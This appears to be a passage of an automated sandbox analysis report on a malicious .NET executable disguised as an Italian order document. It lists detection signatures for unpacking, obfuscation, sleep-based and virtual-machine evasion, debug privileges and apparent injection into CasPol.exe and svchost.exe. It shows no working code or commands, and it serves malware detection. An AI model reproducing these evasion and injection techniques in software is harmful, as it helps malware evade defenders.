          .NET source code contains potential unpacker
          Source: Requisito ordine n. 230210.exe, program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: Requisito ordine n. 230210.exe, dg3ypDAonQcOidMs0w/WP6RZJql8gZrNhVA9v.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeCode function: 0_2_0000022275059A96 push 28000001h; iretd 0_2_0000022275059AA1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E84A push ebx; retf 555Dh1_2_0041E851
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004090EC push ebx; retf 1_2_004090F7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004118B6 push edi; iretd 1_2_004118CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004101C4 push ss; retf 1_2_004101CE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041B4E3 pushad ; ret 1_2_0041B4EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00401D80 push eax; ret 1_2_00401D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00408DB6 push ebx; retf 1_2_00408DB9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00411654 push esi; ret 1_2_00411656
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00405E83 push esi; ret 1_2_00405E8E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00408F31 push esp; retf 1_2_00408F43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0167D0D1 push ecx; ret 1_2_0167D0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0327D0D1 push ecx; ret 11_2_0327D0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3CAC7 push ebx; retf 555Dh11_2_02C3CACE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C27369 push ebx; retf 11_2_02C27374
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C27033 push ebx; retf 11_2_02C27036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C271AE push esp; retf 11_2_02C271C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C24100 push esi; ret 11_2_02C2410B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C39760 pushad ; ret 11_2_02C39767
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C2E441 push ss; retf 11_2_02C2E44B
          Source: Requisito ordine n. 230210.exeStatic PE information: 0xD115FA56 [Thu Feb 27 10:41:26 2081 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.896625540706908
          Source: Requisito ordine n. 230210.exe, dg3ypDAonQcOidMs0w/WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: '.cctor', 'gcXExg6wxEuIJ', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB', 'ubAof6RgCm', 'YpJoWsPi7X', 'BEVodWAYPB', 'gX8onkMSd7', 'PEXoCqmS4w'
          Source: Requisito ordine n. 230210.exe, fQosxZ2k0KXs2yyDcFA/XliSbN2oAPxhVpUoRhK.csHigh entropy of concatenated method names: 'yP9kTyWRjv', 'eBxqprrF8', 'dLNk983wBy', '.ctor', 'OVD4Ze80Ue1Ox', '.cctor', 'NfHwGwGa299bi2xaZA', 'U6RoZ4loWEPrAhYiSQ', 'Ic2F5Z1mkUy211AcSh', 'O2ttQnQGpuPhYt90FA'
          Source: Requisito ordine n. 230210.exe, oRZtxCaSAYh6EEGEIZ/Idt5pgryuYoFVQiX6j.csHigh entropy of concatenated method names: 'KQSExg66e8m16', '.ctor', '.cctor', 'uY4k17DN8Q1uQcdicL', 'FNhmljpUBs3wxLXG5o', 'SDgIq9TR5MNvD9UXoi', 'OmSQ0EWCrM8owpZ2MU', 'NFSSg14MICyNkWgRGo', 'mJov3MrDsjqT8BMOkD', 'glDqmcRxRL13RR44J0'
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe TID: 5836Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 4988Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F5BA5 rdtsc 1_2_016F5BA5
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 861Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 887Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 6.8 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 8.3 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C331F0 FindFirstFileW,FindNextFileW,FindClose,11_2_02C331F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C331E9 FindFirstFileW,FindNextFileW,FindClose,11_2_02C331E9
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000002.00000002.531863338.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000002.00000003.475379307.000000000F367000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.534189613.000000000F392000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.476622654.000000000F391000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000002.528117624.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000002.00000002.531863338.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000002.532424713.0000000009185000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.476490167.0000000009184000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.490833568.0000000009185000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000002.00000002.531863338.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000002.00000000.292892221.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000002.00000003.475884450.000000000509E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000002.00000000.292892221.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F5BA5 rdtsc 1_2_016F5BA5
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162C962 mov eax, dword ptr fs:[00000030h]1_2_0162C962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162B171 mov eax, dword ptr fs:[00000030h]1_2_0162B171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162B171 mov eax, dword ptr fs:[00000030h]1_2_0162B171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164B944 mov eax, dword ptr fs:[00000030h]1_2_0164B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164B944 mov eax, dword ptr fs:[00000030h]1_2_0164B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01644120 mov eax, dword ptr fs:[00000030h]1_2_01644120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01644120 mov eax, dword ptr fs:[00000030h]1_2_01644120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01644120 mov eax, dword ptr fs:[00000030h]1_2_01644120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01644120 mov eax, dword ptr fs:[00000030h]1_2_01644120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01644120 mov ecx, dword ptr fs:[00000030h]1_2_01644120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165513A mov eax, dword ptr fs:[00000030h]1_2_0165513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165513A mov eax, dword ptr fs:[00000030h]1_2_0165513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629100 mov eax, dword ptr fs:[00000030h]1_2_01629100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629100 mov eax, dword ptr fs:[00000030h]1_2_01629100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629100 mov eax, dword ptr fs:[00000030h]1_2_01629100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162B1E1 mov eax, dword ptr fs:[00000030h]1_2_0162B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162B1E1 mov eax, dword ptr fs:[00000030h]1_2_0162B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162B1E1 mov eax, dword ptr fs:[00000030h]1_2_0162B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016B41E8 mov eax, dword ptr fs:[00000030h]1_2_016B41E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016561A0 mov eax, dword ptr fs:[00000030h]1_2_016561A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016561A0 mov eax, dword ptr fs:[00000030h]1_2_016561A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E49A4 mov eax, dword ptr fs:[00000030h]1_2_016E49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E49A4 mov eax, dword ptr fs:[00000030h]1_2_016E49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E49A4 mov eax, dword ptr fs:[00000030h]1_2_016E49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E49A4 mov eax, dword ptr fs:[00000030h]1_2_016E49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A69A6 mov eax, dword ptr fs:[00000030h]1_2_016A69A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A51BE mov eax, dword ptr fs:[00000030h]1_2_016A51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A51BE mov eax, dword ptr fs:[00000030h]1_2_016A51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A51BE mov eax, dword ptr fs:[00000030h]1_2_016A51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A51BE mov eax, dword ptr fs:[00000030h]1_2_016A51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov eax, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov eax, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov eax, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov eax, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165A185 mov eax, dword ptr fs:[00000030h]1_2_0165A185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164C182 mov eax, dword ptr fs:[00000030h]1_2_0164C182
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652990 mov eax, dword ptr fs:[00000030h]1_2_01652990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F1074 mov eax, dword ptr fs:[00000030h]1_2_016F1074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E2073 mov eax, dword ptr fs:[00000030h]1_2_016E2073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01640050 mov eax, dword ptr fs:[00000030h]1_2_01640050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01640050 mov eax, dword ptr fs:[00000030h]1_2_01640050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165002D mov eax, dword ptr fs:[00000030h]1_2_0165002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165002D mov eax, dword ptr fs:[00000030h]1_2_0165002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165002D mov eax, dword ptr fs:[00000030h]1_2_0165002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165002D mov eax, dword ptr fs:[00000030h]1_2_0165002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165002D mov eax, dword ptr fs:[00000030h]1_2_0165002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163B02A mov eax, dword ptr fs:[00000030h]1_2_0163B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163B02A mov eax, dword ptr fs:[00000030h]1_2_0163B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163B02A mov eax, dword ptr fs:[00000030h]1_2_0163B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163B02A mov eax, dword ptr fs:[00000030h]1_2_0163B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A830 mov eax, dword ptr fs:[00000030h]1_2_0164A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A830 mov eax, dword ptr fs:[00000030h]1_2_0164A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A830 mov eax, dword ptr fs:[00000030h]1_2_0164A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A830 mov eax, dword ptr fs:[00000030h]1_2_0164A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F4015 mov eax, dword ptr fs:[00000030h]1_2_016F4015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F4015 mov eax, dword ptr fs:[00000030h]1_2_016F4015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A7016 mov eax, dword ptr fs:[00000030h]1_2_016A7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A7016 mov eax, dword ptr fs:[00000030h]1_2_016A7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A7016 mov eax, dword ptr fs:[00000030h]1_2_016A7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164B8E4 mov eax, dword ptr fs:[00000030h]1_2_0164B8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164B8E4 mov eax, dword ptr fs:[00000030h]1_2_0164B8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016240E1 mov eax, dword ptr fs:[00000030h]1_2_016240E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016240E1 mov eax, dword ptr fs:[00000030h]1_2_016240E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016240E1 mov eax, dword ptr fs:[00000030h]1_2_016240E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016258EC mov eax, dword ptr fs:[00000030h]1_2_016258EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov eax, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov ecx, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov eax, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov eax, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov eax, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov eax, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016690AF mov eax, dword ptr fs:[00000030h]1_2_016690AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165F0BF mov ecx, dword ptr fs:[00000030h]1_2_0165F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165F0BF mov eax, dword ptr fs:[00000030h]1_2_0165F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165F0BF mov eax, dword ptr fs:[00000030h]1_2_0165F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629080 mov eax, dword ptr fs:[00000030h]1_2_01629080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A3884 mov eax, dword ptr fs:[00000030h]1_2_016A3884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A3884 mov eax, dword ptr fs:[00000030h]1_2_016A3884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162DB60 mov ecx, dword ptr fs:[00000030h]1_2_0162DB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01653B7A mov eax, dword ptr fs:[00000030h]1_2_01653B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01653B7A mov eax, dword ptr fs:[00000030h]1_2_01653B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162DB40 mov eax, dword ptr fs:[00000030h]1_2_0162DB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F8B58 mov eax, dword ptr fs:[00000030h]1_2_016F8B58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162F358 mov eax, dword ptr fs:[00000030h]1_2_0162F358
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
